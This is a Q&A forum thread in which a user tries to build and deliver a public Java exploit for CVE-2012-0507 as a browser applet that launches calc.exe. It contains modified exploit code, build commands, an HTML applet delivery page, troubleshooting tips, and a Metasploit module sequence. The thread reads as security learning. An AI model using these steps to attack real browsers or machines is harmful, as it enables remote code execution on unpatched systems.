# How to compile java_atomicreferencearray (CVE-2012-0507) exploit to run calc.exe on system?

Tags: java, cve

I got interested in Java exploits and stumbled upon this:

https://github.com/redcreen/exploits/tree/master/CVE-2012-0507/redcreen

It is source code for Java exploit, so even though my knowledge of Java is limited (learned some in highschool) so I tried to understand what is going on in the background.

File https://github.com/redcreen/exploits/blob/master/CVE-2012-0507/redcreen/Exploit.java has this code:

```
public static void doExploit() throws Exception {
        Help _tmp = getHelp();
        File file = new File("d:/temp/1.php");
        String cmd = "php " + file.getAbsolutePath();
        System.out.println(Help.doWork(_tmp, cmd));
    }
```

which I presume is the code to be executed with this exploit, so I modified it to:

```
public static void doExploit() throws Exception {
        Help _tmp = getHelp();
        String cmd = "cmd /c start calc.exe";
        System.out.println(Help.doWork(_tmp, cmd));
    }
```

To start calc.exe on successful explotation , and compiled it with:

```
javac -d bin redcreen/*.java
cd bin
jar cvf ../appplet2.jar redcreen/*.class
```

and placed it in applet:

```
<!DOCTYPE html>
<html>
  <head>
    <title>Exploit</title>
  </head>
  <body>
    <applet archive="applet2.jar" code="redcreen.Exploit.class" width=1 height=1></applet>
  </body>
</html>
```

But no luck with `calc.exe` execution on vulnerable Java machine. Metasploit execution does work. Any guidance or suggestion is welcome.

Comment: you are using an old version of java as well ?

Comment: @king Yes I'am , as i explained setup works with metasploit payloads, but when I run this exploit it doesn't run calc.exe . I'm not brave enough to try and change metasploit exploit code.

Comment: @khaomax What's inside `1.php`?

Comment: @Saibot Unfortunately that file is not on github, so I can't really say what is inside it.

Comment: @khaomax Did you try some other commands?

Comment: I notice ExpFile.java has some .close() commented out. This may have been deliberately introduced to stop script kiddies. Try un-commenting them.

Comment: Also, Exploit is not an applet. You need to create a mini applet that calls Exploit. Check the Java console when you start your applet - I expect you'll see errors that show it isn't starting.

Comment: You need first to sign your applet. to diagnostic the problem take a look at the Java Console for debugging tthe applet. you could also add some debugging lines into your code.

Answer (score 1):

My java probably isn't any better than yours, but as I understand the vulnerability, it relies on breaking out of the sandbox to execute code.

I believe that when you replaced the php code with your simple command, you broke the part of the process to get outside the sandbox.

Here is a fairly detailed examination of your problem:
 https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf

Head to page 7 for a detailed explanation of how the exploit works, and the author steps through the code and its execution.

Answer (score 0):

As @paj28 commented, Exploit is not an applet. Instead of running as an applet, simply run (since you compiled it already):

```
cd bin
java Exploit
```

Comment: It's not an exploit if you already have access to run arbitrary commands.

Answer (score 0):

Why not just load the [java_atomicreferencearray](https://www.rapid7.com/db/modules/exploit/multi/browser/java_atomicreferencearray) exploit using the metasploit-framework?

```
msfconsole
use .*java_atomicreferencearray <tab>
info
show missing
set <stuff>
options
check
exploit -j
```

Then just point your vulnerable JRE-enabled browser at the listener URL it provides.